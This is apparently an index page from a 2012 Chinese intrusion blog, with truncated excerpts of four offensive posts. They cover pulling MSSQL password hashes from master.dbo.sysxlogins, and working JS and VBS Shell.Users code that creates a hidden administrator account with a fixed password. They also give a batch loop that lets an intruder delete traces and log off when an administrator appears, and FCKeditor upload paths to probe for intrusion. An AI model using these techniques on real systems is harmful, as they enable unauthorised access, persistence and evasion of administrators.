MsSql及MySql Hash的提取、破解
by
SiNsKy
Posted 一月 20th, 2012 at 3:50 下午
MSSQL
mssql的hash保存在表master.dbo.sysxlogins中,用
select name,password from master.dbo.sysxlogins
可以提取用户hash
0x01004E04BE46023057E323AF27269E5B7DDCA140C98D225BDD3D06E8EFE8CFAEC02985B27B38059FA3B18349612B
分解:
常量部分:0×0100
Salt部分:4E04BE46
混合密文:023057E323AF27269E5B7DDCA140C98D225B...
php版、js版和vbs 版shell.users 加管理员帐号方法
by
SiNsKy
Posted 一月 15th, 2012 at 2:12 上午
js版和vbs版shell.users 加管理员账号的代码来自lcx
js:
var o=new ActiveXObject( "Shell.Users" );
z=o.create("test") ;
z.changePassword("123456","")
z.setting("AccountType")=3;
vbs:
Set o=CreateObject( "Shell.Users" )
Set z=o.create("test")
z.changePassword "123456",""
z.setting("AccountType")=3
php...
嗅探中非常有用的两个批处理命令
by
SiNsKy
Posted 一月 15th, 2012 at 2:00 上午
两个嗅探中比较有用的批处理
第一个批处理:
在渗透中挂机嗅探的时候,如果检测管理员上线就注销自已的 bat
复制下面的内容保存为 xx.bat
quser>1.txt
:hhh
quser>2.txt
fc 1.txt 2.txt | find "*" && del xx.bat 1.txt 2.txt | logoff
goto hhh
说明
当下一个用户连接的时候,程序就删除bat并注销,如果没有用户...
解决Fckeditor删除所有上传页面如何上传入侵
by
SiNsKy
Posted 一月 14th, 2012 at 10:24 上午
一些Fckeditor在没有上传页面的情况下的入侵方式。
首先,你得确定下Fckeditor的版本。
/FCKeditor/editor/dialog/fck_about.html
其次,你确定下以下几个上传页面是否真的被删除了呢?
/FCKeditor/editor/filemanager/browser/default/browser.html
/FCKeditor/editor/filemanager/browser/default/connectors/test.html
/FCKed...
